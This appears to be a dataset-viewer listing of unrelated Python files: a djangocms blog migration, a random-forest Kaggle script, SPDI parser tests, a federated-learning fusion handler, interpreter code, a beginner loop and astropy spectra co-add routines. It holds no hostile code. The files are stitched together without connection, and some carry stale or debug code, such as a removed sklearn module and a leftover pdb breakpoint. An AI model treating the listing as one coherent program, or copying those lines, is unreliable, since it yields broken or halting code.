file_renderer.render(observation, f'sokoban-level-{level}.png')
|
python
|
# Generated by Django 2.2.15 on 2020-08-04 19:14
import aldryn_apphooks_config.fields
import app_data.fields
import cms.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djangocms_blog.models
import djangocms_text_ckeditor.fields
import filer.fields.image
import parler.fields
import parler.models
import sortedm2m.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('taggit', '0003_taggeditem_add_unique_index'),
('filer', '0011_auto_20190418_0137'),
('sites', '0002_alter_domain_unique'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('cms', '0022_auto_20180620_1551'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='modified at')),
],
options={
'verbose_name': 'blog category',
'verbose_name_plural': 'blog categories',
},
bases=(djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=100, verbose_name='Type')),
('namespace', models.CharField(default=None, max_length=100, unique=True, verbose_name='Instance namespace')),
('app_data', app_data.fields.AppDataField(default='{}', editable=False)),
],
options={
'verbose_name': 'blog config',
'verbose_name_plural': 'blog configs',
},
bases=(parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='last modified')),
('date_published', models.DateTimeField(blank=True, null=True, verbose_name='published since')),
('date_published_end', models.DateTimeField(blank=True, null=True, verbose_name='published until')),
('date_featured', models.DateTimeField(blank=True, null=True, verbose_name='featured date')),
('publish', models.BooleanField(default=False, verbose_name='publish')),
('enable_comments', models.BooleanField(default=True, verbose_name='enable comments on post')),
('enable_liveblog', models.BooleanField(default=False, verbose_name='enable liveblog on post')),
('amount', models.CharField(choices=[('R50', 'R50'), ('R100', 'R100'), ('R150', 'R150'), ('R200', 'R200')], default='R50', max_length=200)),
('goal', models.CharField(choices=[('R30 000', 'R30 000'), ('R50 000', 'R50 000'), ('R100 000', 'R100 000'), ('R200 000', 'R200 000')], default='R30 000', max_length=200)),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='djangocms_blog_post_author', to=settings.AUTH_USER_MODEL, verbose_name='author')),
('categories', models.ManyToManyField(blank=True, related_name='blog_posts', to='djangocms_blog.BlogCategory', verbose_name='category')),
('content', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='post_content', slotname='post_content', to='cms.Placeholder')),
('liveblog', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='live_blog', slotname='live_blog', to='cms.Placeholder')),
('main_image', filer.fields.image.FilerImageField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_image', to=settings.FILER_IMAGE_MODEL, verbose_name='main image')),
('main_image_full', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_full', to='filer.ThumbnailOption', verbose_name='main image full')),
('main_image_thumbnail', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_thumbnail', to='filer.ThumbnailOption', verbose_name='main image thumbnail')),
('media', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='media', slotname='media', to='cms.Placeholder')),
('related', sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, to='djangocms_blog.Post', verbose_name='Related Posts')),
('sites', models.ManyToManyField(blank=True, help_text='Select sites in which to show the post. If none is set it will be visible in all the configured sites.', to='sites.Site', verbose_name='Site(s)')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', related_name='djangocms_blog_tags', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
options={
'verbose_name': 'blog article',
'verbose_name_plural': 'blog articles',
'ordering': ('-date_published', '-date_created'),
'get_latest_by': 'date_published',
},
bases=(djangocms_blog.models.KnockerModel, djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='LatestPostsPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_latestpostsplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of latests articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('categories', models.ManyToManyField(blank=True, help_text='Show only the blog articles tagged with chosen categories.', to='djangocms_blog.BlogCategory', verbose_name='filter by category')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Show only the blog articles tagged with chosen tags.', related_name='djangocms_blog_latest_post', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='filter by tag')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='GenericBlogPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_genericblogplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AddField(
model_name='blogcategory',
name='app_config',
field=aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config'),
),
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='djangocms_blog.BlogCategory', verbose_name='parent'),
),
migrations.CreateModel(
name='AuthorEntriesPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_authorentriesplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of author articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('authors', models.ManyToManyField(limit_choices_to={'djangocms_blog_post_author__publish': True}, to=settings.AUTH_USER_MODEL, verbose_name='authors')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='PostTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('title', models.CharField(max_length=752, verbose_name='title')),
('slug', models.SlugField(allow_unicode=True, blank=True, max_length=752, verbose_name='slug')),
('subtitle', models.CharField(blank=True, default='', max_length=767, verbose_name='subtitle')),
('abstract', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='abstract')),
('meta_description', models.TextField(blank=True, default='', verbose_name='post meta description')),
('meta_keywords', models.TextField(blank=True, default='', verbose_name='post meta keywords')),
('meta_title', models.CharField(blank=True, default='', help_text='used in title tag and social sharing', max_length=2000, verbose_name='post meta title')),
('post_text', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='text')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.Post')),
],
options={
'verbose_name': 'blog article Translation',
'db_table': 'djangocms_blog_post_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfigTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('app_title', models.CharField(max_length=234, verbose_name='application title')),
('object_name', models.CharField(default='Article', max_length=234, verbose_name='object name')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogConfig')),
],
options={
'verbose_name': 'blog config Translation',
'db_table': 'djangocms_blog_blogconfig_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogCategoryTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('name', models.CharField(max_length=752, verbose_name='name')),
('slug', models.SlugField(blank=True, max_length=752, verbose_name='slug')),
('meta_description', models.TextField(blank=True, default='', verbose_name='category meta description')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogCategory')),
],
options={
'verbose_name': 'blog category Translation',
'db_table': 'djangocms_blog_blogcategory_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
]
|
python
|
import pandas as pd
import numpy as np
import ml_metrics as metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.calibration import CalibratedClassifierCV
from sklearn.cross_validation import StratifiedKFold
from sklearn.metrics import log_loss
path = '../Data/'
print("read training data")
train = pd.read_csv(path+"train_tfidf.csv")
label = train['target']
trainID = train['id']
del train['id']
del train['target']
tsne = pd.read_csv(path+'tfidf_train_tsne.csv')
train = train.join(tsne)
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(train.values, label)
print("read test data")
test = pd.read_csv(path+"test_tfidf.csv")
ID = test['id']
del test['id']
tsne = pd.read_csv(path+'tfidf_test_tsne.csv')
test = test.join(tsne)
clf_probs = iso_clf.predict_proba(test.values)
sample = pd.read_csv(path+'sampleSubmission.csv')
print("writing submission data")
submission = pd.DataFrame(clf_probs, index=ID, columns=sample.columns[1:])
submission.to_csv(path+"rf_tfidf.csv",index_label='id')
# retrain
sample = pd.read_csv(path+'sampleSubmission.csv')
submission = pd.DataFrame(index=trainID, columns=sample.columns[1:])
nfold=5
skf = StratifiedKFold(label, nfold, random_state=131)
score = np.zeros(nfold)
i=0
for tr, te in skf:
X_train, X_test, y_train, y_test = train.values[tr], train.values[te], label[tr], label[te]
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(X_train, y_train)
pred = iso_clf.predict_proba(X_test)
tmp = pd.DataFrame(pred, columns=sample.columns[1:])
submission.iloc[te] = pred
score[i]= log_loss(y_test,pred,eps=1e-15, normalize=True)
print((score[i]))
i+=1
print(("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score))))
# cv 10, 0.475277 + 0.00974157
# nfold 5: 0.48047625 + 0.0114040
# nfold 3: 0.4870385 + 0.0059006
print((log_loss(label,submission.values,eps=1e-15, normalize=True)))
submission.to_csv(path+"rf_tfidf_retrain.csv",index_label='id')
|
python
|
import pytest
from mutalyzer_spdi_parser.convert import to_hgvs_internal_model, to_spdi_model
TESTS_SET = [
(
"NG_012337.3:10:C:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "C",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"deleted": [{"sequence": "C", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:1:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 1,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::T",
{
"seq_id": "NG_012337.3",
"position": 10,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:0:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 0,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:CT:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
}
],
},
),
(
"NG_012337.3:10:CT:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::",
{
"seq_id": "NG_012337.3",
"position": 10,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [
{
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"source": "reference",
}
],
}
],
},
),
(
"NP_003997.1:1:M:RSTV",
{
"seq_id": "NP_003997.1",
"position": 1,
"deleted_sequence": "M",
"inserted_sequence": "RSTV",
},
{
"type": "description_dna",
"reference": {"id": "NP_003997.1"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 1},
"end": {"type": "point", "position": 2},
},
"deleted": [{"sequence": "M", "source": "description"}],
"inserted": [{"sequence": "RSTV", "source": "description"}],
}
],
},
),
(
"NM_003002.2:273:g:u",
{
"seq_id": "NM_003002.2",
"position": 273,
"deleted_sequence": "g",
"inserted_sequence": "u",
},
{
"type": "description_dna",
"reference": {"id": "NM_003002.2"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 273},
"end": {"type": "point", "position": 274},
},
"deleted": [{"sequence": "g", "source": "description"}],
"inserted": [{"sequence": "u", "source": "description"}],
}
],
},
),
]
@pytest.mark.parametrize(
"description, model",
[(t[0], t[1]) for t in TESTS_SET],
)
def test_to_spdi_model(description, model):
assert to_spdi_model(description) == model
@pytest.mark.parametrize(
"description, model",
[(t[0], t[2]) for t in TESTS_SET],
)
def test_to_hgvs_internal_model(description, model):
assert to_hgvs_internal_model(description) == model
|
python
|
"""
Licensed Materials - Property of IBM
Restricted Materials of IBM
20190891
© Copyright IBM Corp. 2021 All Rights Reserved.
"""
"""
Module to where fusion algorithms are implemented.
"""
import logging
import numpy as np
from ibmfl.aggregator.fusion.iter_avg_fusion_handler import \
IterAvgFusionHandler
logger = logging.getLogger(__name__)
class RLFusionHandler(IterAvgFusionHandler):
"""
Class for weight based Federated Averaging aggregation.
In this class, the simple averaging aggregation is performed over the RL
policy model weights.
"""
def __init__(self, hyperparams, protocol_handler,
fl_model=None,
data_handler=None,
**kwargs):
super().__init__(hyperparams,
protocol_handler,
data_handler,
fl_model,
**kwargs)
self.name = "RLAvgFusion"
def fusion_collected_responses(self, lst_model_updates):
"""
Receives a list of model updates, where a model update is of the type
`ModelUpdate`, using the weights included in each model_update, it
finds the mean of weights per layer (indicating by key)
:param lst_model_updates: List of model updates of type `ModelUpdate` \
to be averaged.
:type lst_model_updates: `lIst`
:return: results after aggregation
:rtype: `dict`
"""
weights = dict()
# Key list gives layers of the neural network
weights_key_list = list(lst_model_updates[0].get('weights').keys())
# Iterate through the layers of neutral network
for key in weights_key_list:
w = []
for update in lst_model_updates:
w.append(np.array(update.get('weights').get(key)))
avg_weight = np.mean(np.array(w), axis=0)
weights[key] = avg_weight
return weights
|
python
|
from lark import Tree
from copy import deepcopy
from .values import Value, ValueType
from .symbols import Symbol, Symbols
from .debug import DebugOutput
from .converters import get_symbol_name_from_key_item, get_array_index_exp_token_from_key_item
from . import blocks
from . import expressions
class Key():
def __init__(self, token: Tree, current_block):
self.key_items = []
for key_item in token.children:
symbol_name = get_symbol_name_from_key_item(key_item)
array_index_exp_token = get_array_index_exp_token_from_key_item(
key_item)
if array_index_exp_token:
array_index_exp = expressions.Expression(
array_index_exp_token, current_block)
else:
array_index_exp = None
key_item = {
"symbol_name": symbol_name,
"array_index_exp": array_index_exp,
}
self.key_items.append(key_item)
self.current_block = current_block
def get_value(self) -> Value:
value = self.__search_recursively()
return deepcopy(value)
def set_value(self, value: Value):
key_value = self.__search_recursively()
key_value.assign_value(value)
def set_value_in_python(self, value_in_python):
value = self.__search_recursively()
value.assign_value_in_python(value_in_python)
def __search_recursively(self) -> Value:
# Do one level only here
# Fixme
value = None
block = self.current_block
for key_item in self.key_items:
symbol_name = key_item['symbol_name']
array_index_exp = key_item['array_index_exp']
symbol = block.search_symbol_by_name_recursively(symbol_name)
if not symbol:
return None
if array_index_exp:
value = symbol.value.value_in_python[int(array_index_exp.get_value().value_in_python)]
else:
value = symbol.value
if not isinstance(value.value_type, blocks.TypeBlock):
break
else:
block = value.value_in_python
return value
def debug_output(self):
DebugOutput.output_block_attr("key")
DebugOutput.increase_depth()
DebugOutput.output(self.key_items)
DebugOutput.decrease_depth()
|
python
|
numero=int(input('Coloque o seu numero: '))
x=0
while x <= numero:
if x % 2 == 0:
print (x)
x = x + 1
|
python
|
# -*- coding: utf-8 -*-
"""Package to support metabarcoding read trimmming, merging, and quantitation."""
import os
__version__ = "0.1.0-alpha"
_ROOT = os.path.abspath(os.path.dirname(__file__))
ADAPTER_PATH = os.path.join(_ROOT, "data", "TruSeq3-PE.fa")
|
python
|
import numpy as np
import pylab as pl
from astropy.io import fits
from astropy.table import Table
from linetools.spectra.io import readspec
from linetools.spectra.xspectrum1d import XSpectrum1D
from linetools.spectra.utils import collate
import numpy as np
from pypeit.core import coadd as arco
from astropy import units as u
"""Main module for co-addition of 1-d spectra"""
def coadd_stis_from_x1dfiles_old(filenames, wv_array=None, rebin=None, debug=False):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
def coadd_stis_from_x1dfiles(filenames, wv_array=None, rebin=None, debug=True):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs,None, weights)
# spec1d = arco.coadd_spectra(specs, wave_grid_method='velocity', scale_method='auto')
return spec1d
def load_single_x1d_stis(filename, debug=False):
"""
Parameters
----------
filename : str
Filename of the fits x1d STIS file
Could me multiextension
Returns
-------
spec_list : list of XSpectrum1D objects, one for each echelle order
of the single STIS x1d file
"""
# get number of extensions
head = fits.getheader(filename, ext=0)
numext = head['NEXTEND']
spec_list = [] # store XSpectrum1D here.
for ext in range(1, numext + 1):
sp = fits.getdata(filename, ext=ext)
print("Loading echelle orders from file {}, ext={}".format(filename, ext))
for ii in range(len(sp.SPORDER)):
# chop pixels at edges of orders (i.e. poor sensitivity)
nchop_blue = 5
nchop_red = 50
fl = sp.FLUX[ii][nchop_blue:-nchop_red]
er = sp.ERROR[ii][nchop_blue:-nchop_red]
wv = sp.WAVELENGTH[ii][nchop_blue:-nchop_red]
spec = XSpectrum1D.from_tuple((wv,fl,er))
spec_list += [spec]
if debug:
pl.plot(sp.WAVELENGTH[ii], sp.FLUX[ii], drawstyle='steps-mid')
pl.plot(sp.WAVELENGTH[ii], sp.ERROR[ii], ":")
return spec_list
def coadd_cos_from_x1dfiles(filenames, wv_array=None, A_pix=0.01*u.AA):
spec_list = []
#TODO: mask out x1d spectral regions with bad values.
for filename in filenames:
sp = readspec(filename)
import pdb; pdb.set_trace()
# mask =
spec_list += [sp]
# spec_list contains all individual spectra
specs = collate(spec_list) # now all in a single XSpectrum1D object
#rebin
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
A_pix = A_pix.to("AA").value
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='pixel', A_pix=A_pix)
else:
cat_wave = wv_array.to('AA').value
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.